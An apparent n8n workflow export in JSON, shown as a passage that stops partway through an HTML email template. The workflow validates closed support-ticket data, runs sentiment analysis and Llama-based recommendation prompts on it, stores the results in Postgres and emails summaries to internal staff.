workflowsAnalisis de Sentimineto Tickets.json
{"createdAt":"2025-04-15T20:50:21.160Z","updatedAt":"2025-06-13T15:50:20.000Z","id":"6OPoBMQaHUd7Qhlm","name":"Analisis de Sentimineto Tickets","active":true,"isArchived":false,"nodes":[{"parameters":{"httpMethod":"POST","path":"analytics_sent","responseMode":"lastNode","options":{"allowedOrigins":"*","rawBody":"={{ true }}","responseContentType":"application/json"}},"type":"n8n-nodes-base.webhook","typeVersion":2,"position":[-460,-20],"id":"5ac3fa16-8d14-47da-a49c-0ff6929fec08","name":"Webhook","webhookId":"b9086e5a-7118-4682-9d60-8a116a55592b"},{"parameters":{"mode":"runOnceForEachItem","jsCode":"const data = $json; // El JSON validado y completo\n\nconst info = data.info || {};\nconst cierre = data.cierre || {};\nconst messages = data.messages || [];\n\n// Lista de disclaimers a eliminar (puedes agregar más si surgen otros)\nconst disclaimers = [\n  `***** Disclaimer ***** This email (including any attachments) is intended only for the recipient(s) named above. It may contain confidencial or privileged information and should not be read, copied or otherwise used by any other person. If you are not a recipient, please contact the sender and delete the email from your system. ***** Aviso de Confidencialidad ***** Este mensaje, (incluyendo cualquier anexo) está dirigido únicamente a los destinatarios arriba señalados. Puede contener información confidencial o privilegiada y no debe ser leído, copiado o de otra forma utilizado por cualquier otra persona. Si usted recibe esta comunicación por error, favor avisar al remitente y eliminar el mensaje de su sistema.`,\n  `***** Disclaimer ***** This email (including any attachments) is intended only for the recipient(s) named above. It may contain confidencial or privileged information and should not be read, copied or otherwise used by any other person. If you are not a recipient, please contact the sender and delete the email from your system.`,\n  `***** Aviso de Confidencialidad ***** Este mensaje, (incluyendo cualquier anexo) está dirigido únicamente a los destinatarios arriba señalados. Puede contener información confidencial o privilegiada y no debe ser leído, copiado o de otra forma utilizado por cualquier otra persona. Si usted recibe esta comunicación por error, favor avisar al remitente y eliminar el mensaje de su sistema.`,\n];\n\n// Crear encabezado del ticket\nlet markdown = `# Ticket: ${info.casenumber || 'N/A'}\\n\\n`;\nmarkdown += `**Cliente:** ${info.customerName || 'N/A'}  \\n`;\nmarkdown += `**ID Cliente:** ${info.customerID || 'N/A'}  \\n`;\nmarkdown += `**Estado:** ${info.status?.value || 'N/A'}  \\n`;\nmarkdown += `**Prioridad:** ${info.customerType || 'N/A'}  \\n\\n`;\n\n// Sección de interacciones\nmarkdown += `## Historial de Interacciones\\n\\n`;\n\nif (messages.length > 0) {\n  messages\n    .filter(msg => msg.message && !msg.message.includes('[IMAGE]'))\n    .forEach(msg => {\n      const fecha = msg.date || 'Fecha desconocida';\n\n      // Eliminar todos los disclaimers conocidos\n      let mensajeLimpio = msg.message;\n      disclaimers.forEach(texto => {\n        mensajeLimpio = mensajeLimpio.replaceAll(texto, '');\n      });\n\n      // Limpiar espacios\n      mensajeLimpio = mensajeLimpio\n        .replace(/\\n/g, ' ')\n        .replace(/\\s+/g, ' ')\n        .trim();\n\n      // Eliminar comillas simples y dobles\n      mensajeLimpio = mensajeLimpio.replace(/['\"]/g, '');\n      \n      markdown += `### ${msg.author?.value || 'Anónimo'} - ${fecha}\\n`;\n      markdown += `${mensajeLimpio}\\n\\n`;\n    });\n} else {\n  markdown += \"* No hay interacciones registradas\\n\\n\";\n}\n\n// Sección de cierre\nif (cierre && Object.keys(cierre).length > 0) {\n  markdown += `## Detalles de Cierre\\n\\n`;\n  markdown += `**Motivo:** ${cierre.Reason_for_Closing || 'N/A'}  \\n`;\n  markdown += `**Responsable:** ${cierre.Responsable || 'N/A'}  \\n`;\n  markdown += `**Descripción:** ${cierre.Incident_Description || 'N/A'}  \\n\\n`;\n}\n\n// Devolver como objeto que n8n espera\nreturn {\n  json: {\n    markdownContent: markdown,\n    ticketId: info.casenumber,\n    customerId: info.customerID,\n    status: info.status?.value\n  }\n};\n"},"type":"n8n-nodes-base.code","typeVersion":2,"position":[500,-60],"id":"59da43a7-2d31-407a-a4c0-1eaf5d54ecd9","name":"Code","alwaysOutputData":true},{"parameters":{"inputText":"={{ $('Code').item.json.markdownContent }}","options":{"categories":"Positive, Neutral, Negative","includeDetailedResults":true,"enableAutoFixing":true}},"type":"@n8n/n8n-nodes-langchain.sentimentAnalysis","typeVersion":1,"position":[1360,-160],"id":"de8de0cd-5734-4f47-a025-17123145fe28","name":"Sentiment Analysis","alwaysOutputData":false},{"parameters":{"model":{"__rl":true,"value":"llama-3.3-70B-Instruct","mode":"list","cachedResultName":"llama-3.3-70B-Instruct"},"options":{"temperature":0.3}},"type":"@n8n/n8n-nodes-langchain.lmChatOpenAi","typeVersion":1.2,"position":[1280,120],"id":"4d971b29-cb01-40e6-852d-83551d7b58e4","name":"OpenAI Chat Model","notesInFlow":true,"credentials":{"openAiApi":{"id":"lu44hoWfCkZALmQk","name":"Api Sentinel"}},"notes":"Utilizando Llama70B"},{"parameters":{"promptType":"define","text":"=Crea un analisis del resultado de analisis de sentmiento\ndonde los mensajes son {{ $('Code').item.json.markdownContent }} y el resultado del analisis es:{{ $json.sentimentAnalysis.category }}\n\nEntrega 3 Recomendaciones para mejorar los resultados del sentimiento del cliente.\n\nIntenta explicar porqué el sentimiento del cliente fue: {{ $json.sentimentAnalysis.category }}\n\nUtiliza la informacion para recomendar acciones\n\nTODOS LOS CASOS YA HAN SIDO CERRADOS, LAS RECOMENDACIONES DEBEN SER PARA FUTUROS CASOS CON EL CLIENTE\n\nUtiliza solo la informacion suministrada.\n\nLimita tu respuesta a maximo 200 Palabras\n\n\nEntrega la seccion de los mensajes que produce el resultado del sentimiento, muestra solo un fragmento\n\n\"You must always return valid JSON fenced by a markdown code block. Do not return any additional text.\"\nresumen,\nfragmento,\nrecomendaciones:array\n","hasOutputParser":true,"options":{"systemMessage":"Responde siempre en formato Json "}},"type":"@n8n/n8n-nodes-langchain.agent","typeVersion":1.8,"position":[1200,360],"id":"c17b485c-c5e6-4bc5-a816-2919441f26be","name":"AI Agent"},{"parameters":{"assignments":{"assignments":[{"id":"1826b932-5d72-414d-a4c5-9bb71e9a1f63","name":"sentimentAnalysis","value":"={{ $json.sentimentAnalysis }}","type":"object"},{"id":"779e9857-33d0-4db9-9377-6a75da6782b0","name":"ticketId","value":"={{ $('Code').item.json.ticketId }}","type":"string"},{"id":"bea65672-506c-4916-a4b4-66895f6a8809","name":"Cliente","value":"={{ $('ValidoJson').item.json.info.customerName }}","type":"string"},{"id":"a777d42b-9fbf-49ee-baac-45ec92e41b6c","name":"customerId","value":"={{ $('ValidoJson').item.json.info.customerID }}","type":"string"},{"id":"0943427e-dd3c-48c6-ba92-ceb2c3ccfc71","name":"tipoCliente","value":"={{ $('ValidoJson').item.json.info.customerType }}","type":"string"}]},"options":{}},"type":"n8n-nodes-base.set","typeVersion":3.4,"position":[960,360],"id":"d9e51775-7ab8-4712-9133-c75bb3ca6063","name":"Formateo de Campos"},{"parameters":{"promptType":"define","text":"=Crea un analisis del resultado de analisis de sentmiento\ndonde los mensajes son {{ $('Code').item.json.markdownContent }} y el resultado del analisis es:{{ $json.sentimentAnalysis.category }}\n\nEntrega 3 Recomendaciones para mejorar los resultados del sentimiento del cliente.\n\nExtrae el fragmento de la informacion compartida que define el sentimiento del analisis\n\nIntenta explicar porqué el sentimiento del cliente fue: {{ $json.sentimentAnalysis.category }}\n\nUtiliza la informacion para recomendar acciones\n\nTODOS LOS CASOS YA HAN SIDO CERRADOS, LAS RECOMENDACIONES DEBEN SER PARA FUTUROS CASOS CON EL CLIENTE\n\nUtiliza solo la informacion suministrada.\n\nEntrega la seccion de los mensajes que produce el resultado del sentimiento, muestra solo un fragmento\n\n\"You must always return valid JSON fenced by a markdown code block. Do not return any additional text.\"\nresumen,\nfragmento,\nrecomendaciones:array","hasOutputParser":true,"options":{"systemMessage":"Responde siempre en formato Json \n"}},"type":"@n8n/n8n-nodes-langchain.agent","typeVersion":1.8,"position":[1200,800],"id":"6ea04343-fc33-4e15-ae51-489af4f63afd","name":"AI Agent1"},{"parameters":{"model":{"__rl":true,"value":"llama-3.3-70B-Instruct","mode":"list","cachedResultName":"llama-3.3-70B-Instruct"},"options":{"responseFormat":"json_object","temperature":0.3}},"type":"@n8n/n8n-nodes-langchain.lmChatOpenAi","typeVersion":1.2,"position":[1140,1000],"id":"8b88ac20-8ec6-498a-a7b7-1cd5ced71831","name":"OpenAI Chat Model2","credentials":{"openAiApi":{"id":"lu44hoWfCkZALmQk","name":"Api Sentinel"}}},{"parameters":{"assignments":{"assignments":[{"id":"cbecb362-93e1-49c4-a6f9-16adf09f127c","name":"ticketId","value":"={{ $('Formateo de Campos').item.json.ticketId }}","type":"string"},{"id":"74e97578-bf99-4882-b023-922da8d6b4ba","name":"cliente","value":"={{ $('Formateo de Campos').item.json.Cliente }}","type":"string"},{"id":"2282db41-c4b3-4873-8886-5776483d0f30","name":"tipoCliente","value":"={{ $('Formateo de Campos').item.json.tipoCliente }}","type":"string"},{"id":"c4c1f076-0281-4f7c-8c18-d1d001d7ef86","name":"customerId","value":"={{ $('Formateo de Campos').item.json.customerId }}","type":"string"},{"id":"7137fb7e-e427-4341-8454-234b94024334","name":"sentimentAnalysis.category","value":"={{ $('Formateo de Campos').item.json.sentimentAnalysis.category }}","type":"string"},{"id":"9197bc61-a6ba-41c5-8b7f-5894dadd3441","name":"output","value":"={{ $json.output }}","type":"object"},{"id":"d6b6375b-a54b-4b90-9d48-12eaaeec2179","name":"sentimentAnalysis.strength","value":"={{ $('Sentiment Analysis').item.json.sentimentAnalysis.strength }}","type":"number"},{"id":"755c9bd0-09b5-482b-9e3e-c9face2e5d46","name":"sentimentAnalysis.confidence","value":"={{ $('Sentiment Analysis').item.json.sentimentAnalysis.confidence }}","type":"number"},{"id":"625ad804-8ed9-4233-ac8e-20b8e7d06b63","name":"info.startdate","value":"={{ $('ValidoJson').item.json.info.startdate }}","type":"string"}]},"options":{}},"type":"n8n-nodes-base.set","typeVersion":3.4,"position":[1620,360],"id":"49cf1e48-e743-4da5-b0ac-b0f44d46f66c","name":"Formato de Salida Endpoint_2"},{"parameters":{},"type":"n8n-nodes-base.merge","typeVersion":3.1,"position":[1920,200],"id":"01b55b63-01e7-4690-82aa-3cd463953077","name":"Merge"},{"parameters":{"jsCode":"// Acceder correctamente a los datos en n8n\nconst items = $input.all();\nconst result = [];\n\nfor (let i = 0; i < items.length; i++) {\n  // Crear una copia del objeto json\n  const newJson = {...items[i].json};\n  \n  // Convertir customerId a número\n  newJson.customerId = Number(newJson.customerId);\n  \n  // Crear un nuevo objeto item con el json modificado\n  const newItem = {\n    json: newJson\n  };\n  \n  // Añadir al array de resultados\n  result.push(newItem);\n}\n\nreturn result;"},"type":"n8n-nodes-base.code","typeVersion":2,"position":[2120,200],"id":"faad6b84-c839-4bb2-9b58-a6b6abe1aa47","name":"ConverToIntegerCID"},{"parameters":{"operation":"select","schema":{"__rl":true,"mode":"list","value":"public"},"table":{"__rl":true,"value":"sentiment_results","mode":"list","cachedResultName":"sentiment_results"},"where":{"values":[{"column":"caseid","value":"={{ $json.ticketId }}"}]},"options":{"delayClosingIdleConnection":5}},"type":"n8n-nodes-base.postgres","typeVersion":2.6,"position":[980,-260],"id":"ba4991b1-3251-4b5a-8485-6c0e08ed55f0","name":"busca_tt","alwaysOutputData":true,"credentials":{"postgres":{"id":"PrpJ8WzpiFemwSbR","name":"AnalisisSentimiento"}}},{"parameters":{"conditions":{"options":{"caseSensitive":true,"leftValue":"","typeValidation":"strict","version":2},"conditions":[{"id":"b62bee51-2b11-49c3-821a-2bcf233837f2","leftValue":"={{ $json.id }}","rightValue":"","operator":{"type":"number","operation":"exists","singleValue":true}}],"combinator":"and"},"options":{}},"type":"n8n-nodes-base.if","typeVersion":2.2,"position":[1380,-500],"id":"280764ed-51bf-41b8-81d2-84e5b5621321","name":"If"},{"parameters":{"schema":{"__rl":true,"value":"public","mode":"list","cachedResultName":"public"},"table":{"__rl":true,"value":"sentiment_results","mode":"list","cachedResultName":"sentiment_results"},"columns":{"mappingMode":"defineBelow","value":{"strength":"={{ $json.sentimentAnalysis.strength }}","confidence":"={{ $json.sentimentAnalysis.confidence }}","caseid":"={{ $json.ticketId }}","customer":"={{ $json.cliente }}","cid":"={{ $json.customerId }}","sentiment":"={{ $json.sentimentAnalysis.category }}","analisis":"={{ $json.output }}"},"matchingColumns":["id"],"schema":[{"id":"id","displayName":"id","required":false,"defaultMatch":true,"display":true,"type":"number","canBeUsedToMatch":true,"removed":true},{"id":"created_at","displayName":"created_at","required":false,"defaultMatch":false,"display":true,"type":"dateTime","canBeUsedToMatch":true,"removed":true},{"id":"cid","displayName":"cid","required":false,"defaultMatch":false,"display":true,"type":"number","canBeUsedToMatch":true},{"id":"customer","displayName":"customer","required":false,"defaultMatch":false,"display":true,"type":"string","canBeUsedToMatch":true},{"id":"caseid","displayName":"caseid","required":false,"defaultMatch":false,"display":true,"type":"string","canBeUsedToMatch":true},{"id":"sentiment","displayName":"sentiment","required":false,"defaultMatch":false,"display":true,"type":"string","canBeUsedToMatch":true},{"id":"strength","displayName":"strength","required":false,"defaultMatch":false,"display":true,"type":"number","canBeUsedToMatch":true},{"id":"confidence","displayName":"confidence","required":false,"defaultMatch":false,"display":true,"type":"number","canBeUsedToMatch":true},{"id":"json_data","displayName":"json_data","required":false,"defaultMatch":false,"display":true,"type":"object","canBeUsedToMatch":true,"removed":true},{"id":"analisis","displayName":"analisis","required":false,"defaultMatch":false,"display":true,"type":"string","canBeUsedToMatch":true}],"attemptToConvertTypes":false,"convertFieldsToString":false},"options":{}},"type":"n8n-nodes-base.postgres","typeVersion":2.6,"position":[2300,200],"id":"52cef3e0-250e-4589-af8a-a4146270b59d","name":"Postgres","credentials":{"postgres":{"id":"PrpJ8WzpiFemwSbR","name":"AnalisisSentimiento"}}},{"parameters":{"jsCode":"const input = $input.first().json.body;\n\n// Validar existencia general\nif (!input.info || !input.messages || !input.cierre) {\n  throw new Error('Faltan secciones del JSON: se esperaba \"info\", \"messages\" y \"cierre\" en el mismo objeto.');\n}\n\n// Función utilitaria para validar campos\nfunction validateField(obj, key, type = 'string', required = true) {\n  if (!obj.hasOwnProperty(key)) {\n    if (required) throw new Error(`Falta la clave: ${key}`);\n    return;\n  }\n  if (type === 'object') {\n    if (typeof obj[key] !== 'object' || obj[key] === null || Array.isArray(obj[key])) {\n      throw new Error(`La clave \"${key}\" debe ser un objeto`);\n    }\n  } else if (type === 'array') {\n    if (!Array.isArray(obj[key])) {\n      throw new Error(`La clave \"${key}\" debe ser un array`);\n    }\n  } else {\n    if (typeof obj[key] !== type) {\n      throw new Error(`La clave \"${key}\" debe ser de tipo ${type}`);\n    }\n  }\n}\n\n// Validar \"info\"\nconst info = input.info;\n\n['id', 'title', 'casenumber', 'customerID', 'customerName', 'customerType', 'startdate', 'enddate', 'phonealt']\n  .forEach(key => validateField(info, key));\n\n['assigned', 'type', 'type_event', 'creator', 'category', 'services', 'status']\n  .forEach(key => {\n    validateField(info, key, 'object');\n    validateField(info[key], 'id');\n    validateField(info[key], 'value');\n  });\n\n// Validar \"messages\"\nvalidateField(input, 'messages', 'array');\ninput.messages.forEach((msg, i) => {\n  try {\n    validateField(msg, 'id');\n    validateField(msg, 'author', 'object');\n    validateField(msg.author, 'id');\n    validateField(msg.author, 'value');\n    validateField(msg, 'authoremail');\n    validateField(msg, 'date');\n    validateField(msg, 'datesecs', 'number');\n    validateField(msg, 'message');\n    // \"attachment\" es opcional\n  } catch (e) {\n    throw new Error(`Error en messages[${i}]: ${e.message}`);\n  }\n});\n\n// Validar \"cierre\"\nconst cierre = input.cierre;\n\n[\n  'CaseId', 'Company', 'Imputabilidad', 'Responsable',\n  'Unavailable_Minutes', 'unavailable_to_report_minutes',\n  'Type_of_Unavailable', 'date_upgrade_services_affecte',\n  'General_description_cause', 'Servicio', 'Area',\n  'person_confirms_closure', 'overview_fall', 'Reason_for_Closing',\n  'SubReason_for_Closing', 'Equipment', 'Node', 'Displacement',\n  'Reason_Displacement', 'Include_Report', 'Cause_Internal_Error',\n  'email_confirm_close', 'Development_Process_Realized',\n  'Incident_Description', 'Action_Plan'\n].forEach(key => validateField(cierre, key, 'string', false));\n\n// ✅ Si todo es válido, retornar el JSON original\nreturn [{ \n    json: input \n  }];\n"},"type":"n8n-nodes-base.code","typeVersion":2,"position":[-120,-20],"id":"f1c8d964-cc15-4db2-9058-c00d72cc8eab","name":"ValidoJson","onError":"continueErrorOutput"},{"parameters":{"conditions":{"options":{"caseSensitive":true,"leftValue":"","typeValidation":"strict","version":2},"conditions":[{"id":"8cb42c2f-9353-4efe-86a6-4cbd44dd8af5","leftValue":"={{ $json.info }}","rightValue":"","operator":{"type":"object","operation":"exists","singleValue":true}}],"combinator":"and"},"options":{}},"type":"n8n-nodes-base.if","typeVersion":2.2,"position":[180,-40],"id":"0505b532-7798-4552-bf49-4e2bcfb8b0cf","name":"If1"},{"parameters":{"assignments":{"assignments":[{"id":"f331282d-3e11-4107-8018-c668b98d0317","name":"success","value":false,"type":"boolean"},{"id":"cbecb362-93e1-49c4-a6f9-16adf09f127c","name":"ticketId","value":"=","type":"string"},{"id":"74e97578-bf99-4882-b023-922da8d6b4ba","name":"body['datos del ticket'].Incidente.Cliente","value":"=","type":"string"},{"id":"c4c1f076-0281-4f7c-8c18-d1d001d7ef86","name":"customerId","value":"=","type":"string"},{"id":"7137fb7e-e427-4341-8454-234b94024334","name":"sentimentAnalysis.category","value":"=","type":"string"},{"id":"9197bc61-a6ba-41c5-8b7f-5894dadd3441","name":"output","value":"=** ERROR ** Json no valido !  {{ $json.message }}","type":"string"},{"id":"091a7ead-afc4-4c03-b1fd-eff7adc60770","name":"sentimentAnalysis.strength","value":"=","type":"number"},{"id":"13cfb142-fb3e-4c43-a406-ccd12873bd6f","name":"sentimentAnalysis.confidence","value":"=","type":"number"}]},"options":{}},"type":"n8n-nodes-base.set","typeVersion":3.4,"position":[420,-300],"id":"cd6ba465-a9b2-4069-aa27-eba497f2b4c9","name":"ErrorJsonOutput"},{"parameters":{"model":{"__rl":true,"value":"llama-3.3-70B-Instruct","mode":"list","cachedResultName":"llama-3.3-70B-Instruct"},"options":{"responseFormat":"json_object","temperature":0.3}},"type":"@n8n/n8n-nodes-langchain.lmChatOpenAi","typeVersion":1.2,"position":[1140,560],"id":"80d65ad8-b4e4-45f2-bfc1-fa2cef844969","name":"OpenAI Chat Model3","notesInFlow":true,"credentials":{"openAiApi":{"id":"lu44hoWfCkZALmQk","name":"Api Sentinel"}},"notes":"Utiliza llama 8B"},{"parameters":{"rules":{"values":[{"conditions":{"options":{"caseSensitive":true,"leftValue":"","typeValidation":"strict","version":2},"conditions":[{"id":"8261ecd4-5d63-40d3-a197-84ec088319e4","leftValue":"={{ $json.sentimentAnalysis.category }}","rightValue":"Positive","operator":{"type":"string","operation":"equals","name":"filter.operator.equals"}}],"combinator":"and"},"renameOutput":true,"outputKey":"Positive"},{"conditions":{"options":{"caseSensitive":true,"leftValue":"","typeValidation":"strict","version":2},"conditions":[{"leftValue":"={{ $json.sentimentAnalysis.category }}","rightValue":"Neutral","operator":{"type":"string","operation":"equals"},"id":"9711ac4e-3710-4f8f-8ff5-c55e9e8aa705"}],"combinator":"and"},"renameOutput":true,"outputKey":"Neutral"},{"conditions":{"options":{"caseSensitive":true,"leftValue":"","typeValidation":"strict","version":2},"conditions":[{"id":"f8ac4b5e-0426-4b4b-a19c-1d75ce44e5e9","leftValue":"={{ $json.sentimentAnalysis.category }}","rightValue":"Negative","operator":{"type":"string","operation":"equals","name":"filter.operator.equals"}}],"combinator":"and"},"renameOutput":true,"outputKey":"Negative"},{"conditions":{"options":{"caseSensitive":true,"leftValue":"","typeValidation":"strict","version":2},"conditions":[{"id":"d113d642-dafe-4ddd-8df3-486711a77ebe","leftValue":"Error","rightValue":"","operator":{"type":"string","operation":"empty","singleValue":true}}],"combinator":"and"},"renameOutput":true,"outputKey":"Error"}]},"options":{}},"type":"n8n-nodes-base.switch","typeVersion":3.2,"position":[2580,-460],"id":"5545d67a-f780-4f23-b628-d345318ff242","name":"Switch"},{"parameters":{"assignments":{"assignments":[{"id":"9e53b0cd-faa0-4e0e-84d0-5d4d66e7a731","name":"success","value":"={{ $('Switch').item.json.success }}","type":"boolean"},{"id":"cbecb362-93e1-49c4-a6f9-16adf09f127c","name":"ticketId","value":"={{ $('Switch').item.json.ticketId }}","type":"string"},{"id":"74e97578-bf99-4882-b023-922da8d6b4ba","name":"cierre","value":"={{ $('Switch').item.json.cierre }}","type":"string"},{"id":"c4c1f076-0281-4f7c-8c18-d1d001d7ef86","name":"customerId","value":"={{ $('Switch').item.json.customerId }}","type":"string"},{"id":"7137fb7e-e427-4341-8454-234b94024334","name":"sentimentAnalysis.category","value":"={{ $('Switch').item.json.sentimentAnalysis.category }}","type":"string"},{"id":"091a7ead-afc4-4c03-b1fd-eff7adc60770","name":"sentimentAnalysis.strength","value":"={{ $('Switch').item.json.sentimentAnalysis.strength }}","type":"number"},{"id":"13cfb142-fb3e-4c43-a406-ccd12873bd6f","name":"sentimentAnalysis.confidence","value":"={{ $('Switch').item.json.sentimentAnalysis.confidence }}","type":"number"},{"id":"9197bc61-a6ba-41c5-8b7f-5894dadd3441","name":"output","value":"={{ $('Switch').item.json.output }}","type":"string"},{"id":"5afa953c-e9f8-4349-b557-515b527b84d3","name":"","value":"","type":"string"}]},"options":{}},"type":"n8n-nodes-base.set","typeVersion":3.4,"position":[4020,-960],"id":"53bbf65f-165a-4c20-9661-53beda042a6d","name":"Formato de Salida Bd2"},{"parameters":{"assignments":{"assignments":[{"id":"9e53b0cd-faa0-4e0e-84d0-5d4d66e7a731","name":"success","value":true,"type":"boolean"},{"id":"cbecb362-93e1-49c4-a6f9-16adf09f127c","name":"ticketId","value":"={{ $('ConverToIntegerCID').item.json.ticketId }}","type":"string"},{"id":"74e97578-bf99-4882-b023-922da8d6b4ba","name":"cierre","value":"=","type":"string"},{"id":"c4c1f076-0281-4f7c-8c18-d1d001d7ef86","name":"customerId","value":"={{ $('ConverToIntegerCID').item.json.customerId }}","type":"string"},{"id":"7137fb7e-e427-4341-8454-234b94024334","name":"sentimentAnalysis.category","value":"={{ $('ConverToIntegerCID').item.json.sentimentAnalysis.category }}","type":"string"},{"id":"9197bc61-a6ba-41c5-8b7f-5894dadd3441","name":"output","value":"={{ $('ConverToIntegerCID').item.json.output }}","type":"object"},{"id":"091a7ead-afc4-4c03-b1fd-eff7adc60770","name":"sentimentAnalysis.strength","value":"={{ $('ConverToIntegerCID').item.json.sentimentAnalysis.strength }}","type":"number"},{"id":"13cfb142-fb3e-4c43-a406-ccd12873bd6f","name":"sentimentAnalysis.confidence","value":"={{ $('ConverToIntegerCID').item.json.sentimentAnalysis.confidence }}","type":"number"}]},"options":{}},"type":"n8n-nodes-base.set","typeVersion":3.4,"position":[1860,-160],"id":"9948c035-a343-471d-bdd6-bb34f2bfc706","name":"Formato de Salida Bd1"},{"parameters":{"numberInputs":3},"type":"n8n-nodes-base.merge","typeVersion":3.1,"position":[2200,-460],"id":"fe74077d-fdac-45e0-af76-7a478aee28f9","name":"Merge_salida"},{"parameters":{"assignments":{"assignments":[{"id":"9e53b0cd-faa0-4e0e-84d0-5d4d66e7a731","name":"success","value":"=false","type":"boolean"},{"id":"cbecb362-93e1-49c4-a6f9-16adf09f127c","name":"ticketId","value":"=","type":"string"},{"id":"74e97578-bf99-4882-b023-922da8d6b4ba","name":"cierre","value":"=","type":"string"},{"id":"c4c1f076-0281-4f7c-8c18-d1d001d7ef86","name":"customerId","value":"=","type":"string"},{"id":"7137fb7e-e427-4341-8454-234b94024334","name":"sentimentAnalysis.category","value":"=","type":"string"},{"id":"091a7ead-afc4-4c03-b1fd-eff7adc60770","name":"sentimentAnalysis.strength","value":"=","type":"number"},{"id":"13cfb142-fb3e-4c43-a406-ccd12873bd6f","name":"sentimentAnalysis.confidence","value":"=","type":"number"},{"id":"9197bc61-a6ba-41c5-8b7f-5894dadd3441","name":"output","value":"=","type":"string"},{"id":"5afa953c-e9f8-4349-b557-515b527b84d3","name":"error","value":"No se envío el email","type":"string"}]},"options":{}},"type":"n8n-nodes-base.set","typeVersion":3.4,"position":[4020,-500],"id":"63b420ab-ceea-4706-840c-d70d637b7a6e","name":"Salida Error"},{"parameters":{"method":"POST","url":"http://192.168.2.12:5678/webhook/send-mail-aifx","sendBody":true,"bodyParameters":{"parameters":[{"name":"to","value":"adiazs@ifxcorp.com,jfernandez@ifxcorp.com,begonzalez@ifxcorp.com,jaimep@ifxcorp.com"},{"name":"bcc","value":" jaimep@ifxcorp.com"},{"name":"subject","value":"=Analisis de sentimiento:    {{ $('Switch').item.json.ticketId }} - {{ $('Switch').item.json.sentimentAnalysis.category }}"},{"name":"message_html","value":"={{ $json.html }}"}]},"options":{}},"type":"n8n-nodes-base.httpRequest","typeVersion":4.2,"position":[3620,-740],"id":"e13eba75-e25d-416f-9758-41dd2fade56a","name":"Email Neutro","onError":"continueErrorOutput"},{"parameters":{"assignments":{"assignments":[{"id":"f331282d-3e11-4107-8018-c668b98d0317","name":"success","value":false,"type":"boolean"},{"id":"cbecb362-93e1-49c4-a6f9-16adf09f127c","name":"ticketId","value":"=\"\"","type":"string"},{"id":"74e97578-bf99-4882-b023-922da8d6b4ba","name":"Cliente","value":"=\"\"","type":"string"},{"id":"c4c1f076-0281-4f7c-8c18-d1d001d7ef86","name":"customerId","value":"=\"\"","type":"string"},{"id":"7137fb7e-e427-4341-8454-234b94024334","name":"sentimentAnalysis.category","value":"=\"\"","type":"string"},{"id":"9197bc61-a6ba-41c5-8b7f-5894dadd3441","name":"output","value":"=** ERROR ** Json no valido !","type":"string"},{"id":"091a7ead-afc4-4c03-b1fd-eff7adc60770","name":"sentimentAnalysis.strength","value":"=0","type":"number"},{"id":"13cfb142-fb3e-4c43-a406-ccd12873bd6f","name":"sentimentAnalysis.confidence","value":"=0","type":"number"}]},"options":{}},"type":"n8n-nodes-base.set","typeVersion":3.4,"position":[140,-300],"id":"e83c5b16-b2f1-4c71-8918-5f020a8f537c","name":"ErrorJsonNoValido1"},{"parameters":{"assignments":{"assignments":[{"id":"f331282d-3e11-4107-8018-c668b98d0317","name":"success","value":false,"type":"boolean"},{"id":"cbecb362-93e1-49c4-a6f9-16adf09f127c","name":"ticketId","value":"=\"\"","type":"string"},{"id":"74e97578-bf99-4882-b023-922da8d6b4ba","name":"Cliente","value":"=\"\"","type":"string"},{"id":"c4c1f076-0281-4f7c-8c18-d1d001d7ef86","name":"customerId","value":"=\"\"","type":"string"},{"id":"7137fb7e-e427-4341-8454-234b94024334","name":"sentimentAnalysis.category","value":"=\"\"","type":"string"},{"id":"9197bc61-a6ba-41c5-8b7f-5894dadd3441","name":"output","value":"=** ERROR ** Json no valido !","type":"string"},{"id":"091a7ead-afc4-4c03-b1fd-eff7adc60770","name":"sentimentAnalysis.strength","value":"=0","type":"number"},{"id":"13cfb142-fb3e-4c43-a406-ccd12873bd6f","name":"sentimentAnalysis.confidence","value":"=0","type":"number"}]},"options":{}},"type":"n8n-nodes-base.set","typeVersion":3.4,"position":[3360,0],"id":"c5c73046-96c5-4ba3-96e1-82d33f9f1ee3","name":"ErrorJsonNoValido"},{"parameters":{"jsonSchemaExample":"{\n  \"resumen\":\"\",\n  \"fragmento\":\"\",\n  \"recomendaciones\":[\"\",\"\",\"\"]\n}\n"},"type":"@n8n/n8n-nodes-langchain.outputParserStructured","typeVersion":1.2,"position":[1460,1040],"id":"800df4f2-ce26-4ac6-ae56-325a7724b663","name":"Structured Output Parser"},{"parameters":{"jsonSchemaExample":"{\n  \"resumen\":\"\",\n  \"fragmento\":\"\",\n  \"recomendaciones\":[\"\",\"\",\"\"]\n}\n"},"type":"@n8n/n8n-nodes-langchain.outputParserStructured","typeVersion":1.2,"position":[1460,580],"id":"40558252-eb71-4b9c-9cf5-038f8a157607","name":"Structured Output Parser1"},{"parameters":{"html":"<!DOCTYPE html>\n<html lang=\"es\">\n<head>\n  <meta charset=\"UTF-8\">\n  <title>AIFXNetworks - Análisis de Sentimientos</title>\n  <style>\n    body {\n      font-family: 'Segoe UI', Arial, Verdana, sans-serif;\n      background: #f5f7fa;\n      margin: 0;\n      padding: 0;\n      color: #2d3a4a;\n    }\n    .container {\n      width: 85vw;\n      max-width: 1200px;\n      min-width: 320px;\n      margin: 32px auto;\n      background: #fff;\n      border-radius: 14px;\n      box-shadow: 0 2px 8px #e3e7ee;\n      border: 1px solid #e3e7ee;\n      padding-bottom: 32px;\n    }\n    .header {\n      background: #fff;\n      border-radius: 14px 14px 0 0;\n      padding: 32px 32px 16px 32px;\n      display: flex;\n      align-items: center;\n      gap: 16px;\n      border-bottom: 1px solid #e3e7ee;\n    }\n    .logo-placeholder {\n      width: 48px;\n      height: 48px;\n      background: #e3e7ee;\n      border-radius: 8px;\n      display: flex;\n      align-items: center;\n      justify-content: center;\n      font-size: 28px;\n      color: #1976d2;\n      font-weight: bold;\n    }\n    .header-title {\n      font-size: 22px;\n      color: #1976d2;\n      font-weight: bold;\n      margin: 0;\n    }\n    .subtitle {\n      font-size: 15px;\n      color: #607d8b;\n      margin: 0 0 8px 0;\n    }\n    .info-table {\n      width: 92%;\n      margin: 32px auto 0 auto;\n      background: #f4f7fb;\n      border-radius: 8px;\n      padding: 18px 24px;\n      display: flex;\n      flex-wrap: wrap;\n      justify-content: space-between;\n      box-shadow: 0 1px 4px #e3e7ee;\n      border: 1px solid #e3e7ee;\n      font-size: 15px;\n    }\n    /* Estilos condicionales para cada tipo de sentimiento */\n    .info-table-Negative {\n      background: #ffebee !important;\n      border-left: 6px solid #f44336 !important;\n    }\n    .info-table-Positive {\n      background: #e8f5e8 !important;\n      border-left: 6px solid #4caf50 !important;\n    }\n    